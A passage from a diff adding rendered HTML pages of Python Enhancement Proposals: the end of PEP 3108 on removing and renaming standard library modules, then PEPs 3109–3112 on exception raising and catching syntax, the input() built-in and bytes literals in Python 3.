    • Docstring states the module is no longer useful as of revision +27241 (2002-06-15).
    • +
    +
  • +
  • pure
      +
    • Written before Pure Atria was bought by Rational which was then +bought by IBM (in other words, very old).
    • +
    +
  • +
  • test.testall
      +
    • From the days before regrtest.
    • +
    +
  • +
+
+
+

Obsolete

+

Becoming obsolete signifies that either another module in the stdlib +or a widely distributed third-party library provides a better solution +for what the module is meant for.

+
    +
  • Bastion/rexec [done]
      +
    • Restricted execution / security.
    • +
    • Turned off in Python 2.3.
    • +
    • Modules deemed unsafe.
    • +
    +
  • +
  • bsddb185 [done]
      +
    • Superseded by bsddb3
    • +
    • Not built by default.
    • +
    • Documentation specifies that the “module should never be used +directly in new code”.
    • +
    • Available externally from PyPI.
    • +
    +
  • +
  • Canvas [done] +
  • +
  • commands [done]
      +
    • subprocess module replaces it (PEP 324).
    • +
    • Remove getstatus(), move rest to subprocess.
    • +
    +
  • +
  • compiler [done]
      +
    • Having to maintain both the built-in compiler and the stdlib +package is redundant [20].
    • +
    • The AST created by the compiler is available [19].
    • +
    • Mechanism to compile from an AST needs to be added.
    • +
    +
  • +
  • dircache [done]
      +
    • Negligible use.
    • +
    • Easily replicated.
    • +
    +
  • +
  • dl [done]
      +
    • ctypes provides better support for same functionality.
    • +
    +
  • +
  • fpformat [done]
      +
    • All functionality is supported by string interpolation.
    • +
    +
  • +
  • htmllib [done]
      +
    • Superseded by HTMLParser.
    • +
    +
  • +
  • ihooks [done]
      +
    • Undocumented.
    • +
    • For use with rexec which has been turned off since Python 2.3.
    • +
    +
  • +
  • imageop [done]
      +
    • Better support by third-party libraries +(Python Imaging Library [13]).
    • +
    • +
      Unit tests relied on rgbimg and imgfile.
        +
      • rgbimg was removed in Python 2.6.
      • +
      • imgfile slated for removal in this PEP.
      • +
      +
      +
      +
    • +
    +
  • +
  • linuxaudiodev [done]
      +
    • Replaced by ossaudiodev.
    • +
    +
  • +
  • mhlib [done]
      +
    • Should be removed as an individual module; use mailbox +instead.
    • +
    +
  • +
  • popen2 [done]
      +
    • subprocess module replaces it (PEP 324).
    • +
    +
  • +
  • sgmllib [done]
      +
    • Does not fully parse SGML.
    • +
    • In the stdlib for support to htmllib which is slated for removal.
    • +
    +
  • +
  • sre [done]
      +
    • Previously deprecated; import re instead.
    • +
    +
  • +
  • stat [TODO need to move all uses over to os.stat()]
      +
    • os.stat() now returns a tuple with attributes.
    • +
    • Functions in the module should be made into methods for the object +returned by os.stat.
    • +
    +
  • +
  • statvfs [done]
      +
    • os.statvfs now returns a tuple with attributes.
    • +
    +
  • +
  • thread [done]
      +
    • People should use ‘threading’ instead.
        +
      • Rename ‘thread’ to _thread.
      • +
      • Deprecate dummy_thread and rename _dummy_thread.
      • +
      • Move thread.get_ident over to threading.
      • +
      +
    • +
    • Guido has previously supported the deprecation +[9].
    • +
    +
  • +
  • urllib [done]
      +
    • Superseded by urllib2.
    • +
    • Functionality unique to urllib will be kept in the +urllib package.
    • +
    +
  • +
  • UserDict [done: 3.0] [TODO handle 2.6]
      +
    • Not as useful since types can be a superclass.
    • +
    • Useful bits moved to the ‘collections’ module.
    • +
    +
  • +
  • UserList/UserString [done]
      +
    • Not useful since types can be a superclass.
    • +
    • Moved to the ‘collections’ module.
    • +
    +
  • +
+
+
+

Maintenance Burden

+

Over the years, certain modules have become a heavy burden upon +python-dev to maintain. In situations like this, it is better for the +module to be given to the community to maintain to free python-dev to +focus more on language support and other modules in the standard +library that do not take up an undue amount of time and effort.

+
    +
  • bsddb3
      +
    • Externally maintained at +http://www.jcea.es/programacion/pybsddb.htm .
    • +
    • Consistent testing instability.
    • +
    • Berkeley DB follows a different release schedule than Python, +leading to the bindings not necessarily being in sync with what is +available.
    • +
    +
  • +
+
+
+
+

Modules to Rename

+

Many modules existed in +the stdlib before PEP 8 came into existence. This has +led to some naming inconsistencies and namespace bloat that should be +addressed.

+
+

PEP 8 violations [done]

+

PEP 8 specifies that modules “should have short, all-lowercase names” +where “underscores can be used … if it improves readability”. +The use of underscores is discouraged in package names. +The following modules violate PEP 8 and are not somehow being renamed +by being moved to a package.

+ + + + + + + + + + + + + + + + + + + + + + + +
Current NameReplacement Name
_winregwinreg
ConfigParserconfigparser
copy_regcopyreg
Queuequeue
SocketServersocketserver
+
+
+

Merging C and Python implementations of the same interface

+

Several interfaces have both a Python and C implementation. While it +is great to have a C implementation for speed with a Python +implementation as fallback, there is no need to expose the two +implementations independently in the stdlib. For Python 3.0 all +interfaces with two implementations will be merged into a single +public interface.

+

The C module is to be given a leading underscore to delineate the fact +that it is not the reference implementation (the Python implementation +is). This means that any semantic difference between the C and Python +versions must be dealt with before Python 3.0 or else the C +implementation will be removed until it can be fixed.

+

One interface that is not listed below is xml.etree.ElementTree. This +is an externally maintained module and thus is not under the direct +control of the Python development team for renaming. See Open +Issues for a discussion on this.

+
    +
  • pickle/cPickle [done]
      +
    • Rename cPickle to _pickle.
    • +
    • Semantic completeness of C implementation not verified.
    • +
    +
  • +
  • profile/cProfile [TODO]
      +
    • Rename cProfile to _profile.
    • +
    • Semantic completeness of C implementation not verified.
    • +
    +
  • +
  • StringIO/cStringIO [done]
      +
    • Add the class to the ‘io’ module.
    • +
    +
  • +
+
+
+

No public, documented interface [done]

+

There are several modules in the stdlib that have no defined public +interface. These modules exist as support code for other modules that +are exposed. Because they are not meant to be used directly they +should be renamed to reflect this fact.

+ + + + + + + + + + + +
Current NameReplacement Name
markupbase_markupbase
+
+
+

Poorly chosen names [done]

+

A few modules have names that were poorly chosen in hindsight. They +should be renamed so as to prevent their bad name from perpetuating +beyond the 2.x series.

+ + + + + + + + + + + + + + +
Current NameReplacement Name
reprreprlib
test.test_supporttest.support
+
+
+

Grouping of modules [done]

+

As the stdlib has grown, several areas within it have expanded to +include multiple modules (e.g., support for database files). It +thus makes sense to group related modules into packages.

+
+

dbm package

+ + + + + + + + + + + + + + + + + + + + + + + + + + +
Current NameReplacement Name
anydbmdbm.__init__ [1]
dbhashdbm.bsd
dbmdbm.ndbm
dumbdmdbm.dumb
gdbmdbm.gnu
whichdbdbm.__init__ [1]
+ +
+
+

html package

+ + + + + + + + + + + + + + +
Current NameReplacement Name
HTMLParserhtml.parser
htmlentitydefshtml.entities
+
+
+

http package

+ + + + + + + + + + + + + + + + + + + + + + + + + + +
Current NameReplacement Name
httplibhttp.client
BaseHTTPServerhttp.server [2]
CGIHTTPServerhttp.server [2]
SimpleHTTPServerhttp.server [2]
Cookiehttp.cookies
cookielibhttp.cookiejar
+ +
+
+

tkinter package

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Current NameReplacement Name
Dialogtkinter.dialog
FileDialogtkinter.filedialog [4]
FixTktkinter._fix
ScrolledTexttkinter.scrolledtext
SimpleDialogtkinter.simpledialog [5]
Tixtkinter.tix
Tkconstantstkinter.constants
Tkdndtkinter.dnd
Tkintertkinter.__init__
tkColorChoosertkinter.colorchooser
tkCommonDialogtkinter.commondialog
tkFileDialogtkinter.filedialog [4]
tkFonttkinter.font
tkMessageBoxtkinter.messagebox
tkSimpleDialogtkinter.simpledialog [5]
turtletkinter.turtle
+ +
+
+

urllib package

+

Originally this new package was to be named url, but because of +the common use of the name as a variable, it has been deemed better +to keep the name urllib and instead shift existing modules around +into a new package.

+ + + + + + + + + + + + + + + + + + + + +
Current NameReplacement Name
urllib2urllib.request, urllib.error
urlparseurllib.parse
urlliburllib.parse, urllib.request, urllib.error [6]
robotparserurllib.robotparser
+ +
+
+

xmlrpc package

+ + + + + + + + + + + + + + + + + +
Current NameReplacement Name
xmlrpclibxmlrpc.client
DocXMLRPCServerxmlrpc.server [3]
SimpleXMLRPCServerxmlrpc.server [3]
+ +
+
+
+
+

Transition Plan

+
+

Issues

+

Issues related to this PEP:

+ +
+
+

For modules to be removed

+

For module removals, it is easiest to remove the module first in +Python 3.0 to see where dependencies exist. This makes finding +code that (possibly) requires the suppression of the +DeprecationWarning easier.

+
+

In Python 3.0

+
    +
  1. Remove the module.
  2. +
  3. Remove related tests.
  4. +
  5. Remove all documentation (typically the module’s documentation +file and its entry in a file for the Library Reference).
  6. +
  7. Edit Modules/Setup.dist and setup.py if needed.
  8. +
  9. Run the regression test suite (using -uall); watch out for +tests that are skipped because an import failed for the removed +module.
  10. +
  11. Check in the change (with an appropriate Misc/NEWS entry).
  12. +
  13. Update this PEP noting that the 3.0 step is done.
  14. +
+
+
+

In Python 2.6

+
    +
  1. Add the following code to the deprecated module if it is +implemented in Python as the first piece of executed code +(adjusting the module name and the warnings import and +needed):
    from warnings import warnpy3k
    +warnpy3k("the XXX module has been removed in Python 3.0",
    +         stacklevel=2)
    +del warnpy3k
    +
    +
    +

    or the following if it is an extension module:

    +
    if (PyErr_WarnPy3k("the XXX module has been removed in "
    +                   "Python 3.0", 2) < 0)
    +    return;
    +
    +
    +

    (the Python-Dev TextMate bundle, available from Misc/TextMate, +contains a command that will generate all of this for you).

    +
  2. +
  3. Update the documentation. For modules with their own documentation +file, use the :deprecated: option with the module directive +along with the deprecated directive, stating the deprecation +is occurring in 2.6, but is for the module’s removal in 3.0.:
    .. deprecated:: 2.6
    +   The :mod:`XXX` module has been removed in Python 3.0.
    +
    +
    +

    For modules simply listed in a file (e.g., undoc.rst), use the +warning directive.

    +
  4. +
  5. Add the module to the module deletion test in test_py3kwarn.
  6. +
  7. +
    Suppress the warning in the module’s test code using
    test.test_support.import_module(name, deprecated=True).
    +
    +
  8. +
  9. Check in the change w/ appropriate Misc/NEWS entry (block +this checkin in py3k!).
  10. +
  11. Update this PEP noting that the 2.6 step is done.
  12. +
+
+
+
+

Renaming of modules

+

Support in the 2to3 refactoring tool for renames will be used to help +people transition to new module names +[11]. Import statements will be rewritten so that only the import +statement and none of the rest of the code needs to be touched. This +will be accomplished by using the as keyword in import statements +to bind in the module namespace to the old name while importing based +on the new name (when the keyword is not already used, otherwise the +reassigned name should be left alone and only the module that is +imported needs to be changed). The fix_imports fixer is an +example of how to approach this.

+
+

Python 3.0

+
    +
  1. Update 2to3 in the sandbox to support the rename.
  2. +
  3. Use svn move to rename the module.
  4. +
  5. Update all import statements in the stdlib to use the new name +(use 2to3’s fix_imports fixer for the easiest solution).
  6. +
  7. Rename the module in its own documentation.
  8. +
  9. Update all references in the documentation from the old name to +the new name.
  10. +
  11. Run regrtest.py -uall to verify the rename worked.
  12. +
  13. Add an entry in Misc/NEWS.
  14. +
  15. Commit the changes.
  16. +
+
+
+

Python 2.6

+
    +
  1. In the module’s documentation, add a note mentioning that the module is +renamed in Python 3.0:
    .. note::
    +   The :mod:`OLDNAME` module has been renamed to :mod:`NEWNAME` in
    +   Python 3.0.
    +
    +
    +
  2. +
  3. Commit the documentation change.
  4. +
  5. Block the revision in py3k.
  6. +
+
+
+
+
+

Open Issues

+
+

Renaming of modules maintained outside of the stdlib

+

xml.etree.ElementTree not only does not meet PEP 8 naming standards +but it also has an exposed C implementation. It is an +externally maintained package, though PEP 360. A request will be +made for the maintainer to change the name so that it matches PEP 8 +and hides the C implementation.

+
+
+
+

Rejected Ideas

+
+

Modules that were originally suggested for removal

+
    +
  • asynchat/asyncore
      +
    • Josiah Carlson has said he will maintain the modules.
    • +
    +
  • +
  • audioop/sunau/aifc
      +
    • Audio modules where the formats are still used.
    • +
    +
  • +
  • base64/quopri/uu
      +
    • All still widely used.
    • +
    • ‘codecs’ module does not provide as nice of an API for basic +usage.
    • +
    +
  • +
  • fileinput
      +
    • Useful when having to work with stdin.
    • +
    +
  • +
  • linecache
      +
    • Used internally in several places.
    • +
    +
  • +
  • nis
      +
    • Testimonials from people that new installations of NIS are still +occurring
    • +
    +
  • +
  • getopt
      +
    • Simpler than optparse.
    • +
    +
  • +
  • repr
      +
    • Useful as a basis for overriding.
    • +
    • Used internally.
    • +
    +
  • +
  • sched
      +
    • Useful for simulations.
    • +
    +
  • +
  • symtable/_symtable
      +
    • Docs were written.
    • +
    +
  • +
  • telnetlib
      +
    • Really handy for quick-and-dirty remote access.
    • +
    • Some hardware supports using telnet for configuration and +querying.
    • +
    +
  • +
  • Tkinter
      +
    • Would prevent IDLE from existing.
    • +
    • No GUI toolkit would be available out of the box.
    • +
    +
  • +
+
+
+

Introducing a new top-level package

+

It has been suggested that the entire stdlib be placed within its own +package. This PEP will not address this issue as it has its own +design issues (naming, does it deserve special consideration in import +semantics, etc.). Everything within this PEP can easily be handled if +a new top-level package is introduced.

+
+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3108.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3109/index.html b/pep-3109/index.html new file mode 100644 index 00000000000..86320bd71fb --- /dev/null +++ b/pep-3109/index.html @@ -0,0 +1,383 @@ + + + + + + + + PEP 3109 – Raising Exceptions in Python 3000 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3109 – Raising Exceptions in Python 3000

+
+
Author:
+
Collin Winter <collinwinter at google.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Jan-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces changes to Python’s mechanisms for raising +exceptions intended to reduce both line noise and the size of the +language.

+
+
+

Rationale

+

One of Python’s guiding maxims is “there should be one – and +preferably only one – obvious way to do it”. Python 2.x’s +raise statement violates this principle, permitting multiple +ways of expressing the same thought. For example, these statements +are equivalent:

+
raise E, V
+
+raise E(V)
+
+
+

There is a third form of the raise statement, allowing arbitrary +tracebacks to be attached to an exception [1]:

+
raise E, V, T
+
+
+

where T is a traceback. As specified in PEP 344, +exception objects in Python 3.x will possess a __traceback__ +attribute, admitting this translation of the three-expression +raise statement:

+
raise E, V, T
+
+
+

is translated to

+
e = E(V)
+e.__traceback__ = T
+raise e
+
+
+

Using these translations, we can reduce the raise statement from +four forms to two:

+
    +
  1. raise (with no arguments) is used to re-raise the active +exception in an except suite.
  2. +
  3. raise EXCEPTION is used to raise a new exception. This form has +two sub-variants: EXCEPTION may be an exception class or an +instance of an exception class; valid exception classes are +BaseException and its subclasses (PEP 352). If EXCEPTION +is a subclass, it will be called with no arguments to obtain +an exception instance.

    To raise anything else is an error.

    +
  4. +
+

There is a further, more tangible benefit to be obtained through this +consolidation, as noted by A.M. Kuchling [2].

+
PEP 8 doesn't express any preference between the
+two forms of raise statements:
+raise ValueError, 'blah'
+raise ValueError("blah")
+
+I like the second form better, because if the exception arguments
+are long or include string formatting, you don't need to use line
+continuation characters because of the containing parens.
+
+
+

The BDFL has concurred [3] and endorsed the +consolidation of the several raise forms.

+
+
+

Grammar Changes

+

In Python 3, the grammar for raise statements will change +from [1]

+
raise_stmt: 'raise' [test [',' test [',' test]]]
+
+
+

to

+
raise_stmt: 'raise' [test]
+
+
+
+
+

Changes to Builtin Types

+

Because of its relation to exception raising, the signature for the +throw() method on generator objects will change, dropping the +optional second and third parameters. The signature thus changes (PEP 342) +from

+
generator.throw(E, [V, [T]])
+
+
+

to

+
generator.throw(EXCEPTION)
+
+
+

Where EXCEPTION is either a subclass of BaseException or an +instance of a subclass of BaseException.

+
+
+

Semantic Changes

+

In Python 2, the following raise statement is legal

+
raise ((E1, (E2, E3)), E4), V
+
+
+

The interpreter will take the tuple’s first element as the exception +type (recursively), making the above fully equivalent to

+
raise E1, V
+
+
+

As of Python 3.0, support for raising tuples like this will be +dropped. This change will bring raise statements into line with +the throw() method on generator objects, which already disallows +this.

+
+
+

Compatibility Issues

+

All two- and three-expression raise statements will require +modification, as will all two- and three-expression throw() calls +on generators. Fortunately, the translation from Python 2.x to +Python 3.x in this case is simple and can be handled mechanically +by Guido van Rossum’s 2to3 utility [4] using the raise and +throw fixers ([5], [6]).

+

The following translations will be performed:

+
    +
  1. Zero- and one-expression raise statements will be left +intact.
  2. +
  3. Two-expression raise statements will be converted from
    raise E, V
    +
    +
    +

    to

    +
    raise E(V)
    +
    +
    +

    Two-expression throw() calls will be converted from

    +
    generator.throw(E, V)
    +
    +
    +

    to

    +
    generator.throw(E(V))
    +
    +
    +

    See point #5 for a caveat to this transformation.

    +
  4. +
  5. Three-expression raise statements will be converted from
    raise E, V, T
    +
    +
    +

    to

    +
    e = E(V)
    +e.__traceback__ = T
    +raise e
    +
    +
    +

    Three-expression throw() calls will be converted from

    +
    generator.throw(E, V, T)
    +
    +
    +

    to

    +
    e = E(V)
    +e.__traceback__ = T
    +generator.throw(e)
    +
    +
    +

    See point #5 for a caveat to this transformation.

    +
  6. +
  7. Two- and three-expression raise statements where E is a +tuple literal can be converted automatically using 2to3’s +raise fixer. raise statements where E is a non-literal +tuple, e.g., the result of a function call, will need to be +converted manually.
  8. +
  9. Two- and three-expression raise statements where E is an +exception class and V is an exception instance will need +special attention. These cases break down into two camps:
      +
    1. raise E, V as a long-hand version of the zero-argument +raise statement. As an example, assuming F is a subclass +of E
      try:
      +    something()
      +except F as V:
      +    raise F(V)
      +except E as V:
      +    handle(V)
      +
      +
      +

      This would be better expressed as

      +
      try:
      +    something()
      +except F:
      +    raise
      +except E as V:
      +    handle(V)
      +
      +
      +
    2. +
    3. raise E, V as a way of “casting” an exception to another +class. Taking an example from +distutils.compiler.unixcompiler
      try:
      +    self.spawn(pp_args)
      +except DistutilsExecError as msg:
      +    raise CompileError(msg)
      +
      +
      +

      This would be better expressed as

      +
      try:
      +    self.spawn(pp_args)
      +except DistutilsExecError as msg:
      +    raise CompileError from msg
      +
      +
      +

      Using the raise ... from ... syntax introduced in +PEP 344.

      +
    4. +
    +
  10. +
+
+
+

Implementation

+

This PEP was implemented in revision 57783 [7].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3109.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3110/index.html b/pep-3110/index.html new file mode 100644 index 00000000000..543281545b1 --- /dev/null +++ b/pep-3110/index.html @@ -0,0 +1,405 @@ + + + + + + + + PEP 3110 – Catching Exceptions in Python 3000 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3110 – Catching Exceptions in Python 3000

+
+
Author:
+
Collin Winter <collinwinter at google.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Jan-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces changes intended to help eliminate ambiguities +in Python’s grammar, simplify exception classes, simplify garbage +collection for exceptions and reduce the size of the language in +Python 3.0.

+
+
+

Rationale

+
    +
  1. except clauses in Python 2.x present a syntactic ambiguity +where the parser cannot differentiate whether
    except <expression>, <expression>:
    +
    +
    +

    should be interpreted as

    +
    except <type>, <type>:
    +
    +
    +

    or

    +
    except <type>, <name>:
    +
    +
    +

    Python 2 opts for the latter semantic, at the cost of requiring the +former to be parenthesized, like so

    +
    except (<type>, <type>):
    +
    +
    +
  2. +
  3. As specified in PEP 352, the ability to treat exceptions +as tuples will be removed, meaning this code will no longer work
    except os.error, (errno, errstr):
    +
    +
    +

    Because the automatic unpacking will no longer be possible, it is +desirable to remove the ability to use tuples as except targets.

    +
  4. +
  5. As specified in PEP 344, exception instances in Python 3 +will possess a __traceback__ attribute. The Open Issues section +of that PEP includes a paragraph on garbage collection difficulties +caused by this attribute, namely a “exception -> traceback -> +stack frame -> exception” reference cycle, whereby all locals are +kept in scope until the next GC run. This PEP intends to resolve +this issue by adding a cleanup semantic to except clauses in +Python 3 whereby the target name is deleted at the end of the +except suite.
  6. +
  7. In the spirit of “there should be one – and preferably only one +– obvious way to do it”, it is desirable to consolidate +duplicate functionality. To this end, the exc_value, +exc_type and exc_traceback attributes of the sys +module [1] will be removed in favor of +sys.exc_info(), which provides the same information. These +attributes are already listed in PEP 3100 as targeted +for removal.
  8. +
+
+
+

Grammar Changes

+

In Python 3, the grammar for except statements will change +from [4]

+
except_clause: 'except' [test [',' test]]
+
+
+

to

+
except_clause: 'except' [test ['as' NAME]]
+
+
+

The use of as in place of the comma token means that

+
except (AttributeError, os.error):
+
+
+

can be clearly understood as a tuple of exception classes. This new +syntax was first proposed by Greg Ewing [2] and +endorsed ([2], [3]) by the BDFL.

+

Further, the restriction of the token following as from test +to NAME means that only valid identifiers can be used as +except targets.

+

Note that the grammar above always requires parenthesized tuples as +exception classes. That way, the ambiguous

+
except A, B:
+
+
+

which would mean different things in Python 2.x and 3.x – leading to +hard-to-catch bugs – cannot legally occur in 3.x code.

+
+
+

Semantic Changes

+

In order to resolve the garbage collection issue related to PEP 344, +except statements in Python 3 will generate additional bytecode to +delete the target, thus eliminating the reference cycle. +The source-to-source translation, as suggested by Phillip J. Eby +[5], is

+
try:
+    try_body
+except E as N:
+    except_body
+...
+
+
+

gets translated to (in Python 2.5 terms)

+
try:
+    try_body
+except E, N:
+    try:
+        except_body
+    finally:
+        N = None
+        del N
+...
+
+
+

An implementation has already been checked into the py3k (formerly +“p3yk”) branch [6].

+
+
+

Compatibility Issues

+

Nearly all except clauses will need to be changed. except +clauses with identifier targets will be converted from

+
except E, N:
+
+
+

to

+
except E as N:
+
+
+

except clauses with non-tuple, non-identifier targets +(e.g., a.b.c[d]) will need to be converted from

+
except E, T:
+
+
+

to

+
except E as t:
+    T = t
+
+
+

Both of these cases can be handled by Guido van Rossum’s 2to3 +utility [7] using the except fixer [8].

+

except clauses with tuple targets will need to be converted +manually, on a case-by-case basis. These changes will usually need +to be accompanied by changes to the exception classes themselves. +While these changes generally cannot be automated, the 2to3 +utility is able to point out cases where the target of an except +clause is a tuple, simplifying conversion.

+

Situations where it is necessary to keep an exception instance around +past the end of the except suite can be easily translated like so

+
try:
+    ...
+except E as N:
+    ...
+...
+
+
+

becomes

+
try:
+    ...
+except E as N:
+    n = N
+    ...
+...
+
+
+

This way, when N is deleted at the end of the block, n will +persist and can be used as normal.

+

Lastly, all uses of the sys module’s exc_type, exc_value +and exc_traceback attributes will need to be removed. They can be +replaced with sys.exc_info()[0], sys.exc_info()[1] and +sys.exc_info()[2] respectively, a transformation that can be +performed by 2to3’s sysexcattrs fixer.

+
+

2.6 - 3.0 Compatibility

+

In order to facilitate forwards compatibility between Python 2.6 and 3.0, +the except ... as ...: syntax will be backported to the 2.x series. The +grammar will thus change from:

+
except_clause: 'except' [test [',' test]]
+
+
+

to:

+
except_clause: 'except' [test [('as' | ',') test]]
+
+
+

The end-of-suite cleanup semantic for except statements will not be +included in the 2.x series of releases.

+
+
+
+

Open Issues

+
+

Replacing or Dropping “sys.exc_info()”

+

The idea of dropping sys.exc_info() or replacing it with a +sys.exception attribute or a sys.get_exception() function +has been raised several times on python-3000 ([9], +[10]) and mentioned in PEP 344’s “Open Issues” section.

+

While a 2to3 fixer to replace calls to sys.exc_info() +and some attribute accesses would be trivial, it would be far more +difficult for static analysis to find and fix functions that expect +the values from sys.exc_info() as arguments. Similarly, this does +not address the need to rewrite the documentation for all APIs that +are defined in terms of sys.exc_info().

+
+
+
+

Implementation

+

This PEP was implemented in revisions 53342 [11] and 53349 +[12]. Support for the new except syntax in 2.6 was +implemented in revision 55446 [13].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3110.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3111/index.html b/pep-3111/index.html new file mode 100644 index 00000000000..ec56aea7631 --- /dev/null +++ b/pep-3111/index.html @@ -0,0 +1,268 @@ + + + + + + + + PEP 3111 – Simple input built-in in Python 3000 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3111 – Simple input built-in in Python 3000

+
+
Author:
+
Andre Roberge <andre.roberge at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Sep-2006
+
Python-Version:
+
3.0
+
Post-History:
+
22-Dec-2006
+
+
+
+
Table of Contents +
+
+

Abstract

+

Input and output are core features of computer programs. Currently, +Python provides a simple means of output through the print keyword +and two simple means of interactive input through the input() +and raw_input() built-in functions.

+

Python 3.0 will introduce various incompatible changes with previous +Python versions (PEP 3100). +Among the proposed changes, print will become a built-in +function, print(), while input() and raw_input() would be removed completely +from the built-in namespace, requiring importing some module to provide +even the most basic input capability.

+

This PEP proposes that Python 3.0 retains some simple interactive user +input capability, equivalent to raw_input(), within the built-in namespace.

+

It was accepted by the BDFL in December 2006 [5].

+
+
+

Motivation

+

With its easy readability and its support for many programming styles +(e.g. procedural, object-oriented, etc.) among others, Python is perhaps +the best computer language to use in introductory programming classes. +Simple programs often need to provide information to the user (output) +and to obtain information from the user (interactive input). +Any computer language intended to be used in an educational setting should +provide straightforward methods for both output and interactive input.

+

The current proposals for Python 3.0 +include a simple output pathway +via a built-in function named print(), but a more complicated method for +input [e.g. via sys.stdin.readline()], one that requires importing an external +module. Current versions of Python (pre-3.0) include raw_input() as a +built-in function. With the availability of such a function, programs that +require simple input/output can be written from day one, without requiring +discussions of importing modules, streams, etc.

+
+
+

Rationale

+

Current built-in functions, like input() and raw_input(), are found to be +extremely useful in traditional teaching settings. (For more details, +see [2] and the discussion that followed.) +While the BDFL has clearly stated [3] that input() was not to be kept in +Python 3000, he has also stated that he was not against revising the +decision of killing raw_input().

+

raw_input() provides a simple mean to ask a question and obtain a response +from a user. The proposed plans for Python 3.0 would require the replacement +of the single statement:

+
name = raw_input("What is your name?")
+
+
+

by the more complicated:

+
import sys
+print("What is your name?")
+same = sys.stdin.readline()
+
+
+

However, from the point of view of many Python beginners and educators, the +use of sys.stdin.readline() presents the following problems:

+

1. Compared to the name “raw_input”, the name “sys.stdin.readline()” +is clunky and inelegant.

+

2. The names “sys” and “stdin” have no meaning for most beginners, +who are mainly interested in what the function does, and not where +in the package structure it is located. The lack of meaning also makes +it difficult to remember: +is it “sys.stdin.readline()”, or “ stdin.sys.readline()”? +To a programming novice, there is not any obvious reason to prefer +one over the other. In contrast, functions simple and direct names like +print, input, and raw_input, and open are easier to remember.

+

3. The use of “.” notation is unmotivated and confusing to many beginners. +For example, it may lead some beginners to think “.” is a standard +character that could be used in any identifier.

+

4. There is an asymmetry with the print function: why is print not called +sys.stdout.print()?

+
+
+

Specification

+

The existing raw_input() function will be renamed to input().

+

The Python 2 to 3 conversion tool will replace calls to input() with +eval(input()) and raw_input() with input().

+
+
+

Naming Discussion

+

With input() effectively removed from the language, +the name raw_input() makes much less sense and alternatives should be +considered. The various possibilities mentioned in various forums include:

+
ask()
+ask_user()
+get_string()
+input()  # initially rejected by BDFL, later accepted
+prompt()
+read()
+user_input()
+get_response()
+
+
+

While it was initially rejected by the BDFL, it has been suggested that the +most direct solution would be to rename “raw_input” to “input” in Python 3000. +The main objection is that Python 2.x already has a function named “input”, +and, even though it is not going to be included in Python 3000, +having a built-in function with the same name but different semantics may +confuse programmers migrating from 2.x to 3000. Certainly, this is no problem +for beginners, and the scope of the problem is unclear for more experienced +programmers, since raw_input(), while popular with many, is not in +universal use. In this instance, the good it does for beginners could be +seen to outweigh the harm it does to experienced programmers - +although it could cause confusion for people reading older books or tutorials.

+

The rationale for accepting the renaming can be found here [4].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3111.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3112/index.html b/pep-3112/index.html new file mode 100644 index 00000000000..4ef4d6a6c55 --- /dev/null +++ b/pep-3112/index.html @@ -0,0 +1,272 @@ + + + + + + + + PEP 3112 – Bytes literals in Python 3000 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3112 – Bytes literals in Python 3000

+
+
Author:
+
Jason Orendorff <jason.orendorff at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Requires:
+
358
+
Created:
+
23-Feb-2007
+
Python-Version:
+
3.0
+
Post-History:
+
23-Feb-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a literal syntax for the bytes objects +introduced in PEP 358. The purpose is to provide a convenient way to +spell ASCII strings and arbitrary binary data.

+
+
+

Motivation

+

Existing spellings of an ASCII string in Python 3000 include:

+
bytes('Hello world', 'ascii')
+'Hello world'.encode('ascii')
+
+
+

The proposed syntax is:

+
b'Hello world'
+
+
+

Existing spellings of an 8-bit binary sequence in Python 3000 include:

+
bytes([0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00])
+bytes('\x7fELF\x01\x01\x01\0', 'latin-1')
+'7f454c4601010100'.decode('hex')
+
+
+

The proposed syntax is:

+
b'\x7f\x45\x4c\x46\x01\x01\x01\x00'
+b'\x7fELF\x01\x01\x01\0'
+
+
+

In both cases, the advantages of the new syntax are brevity, some +small efficiency gain, and the detection of encoding errors at compile +time rather than at runtime. The brevity benefit is especially felt +when using the string-like methods of bytes objects:

+
lines = bdata.split(bytes('\n', 'ascii'))  # existing syntax
+lines = bdata.split(b'\n')  # proposed syntax
+
+
+

And when converting code from Python 2.x to Python 3000:

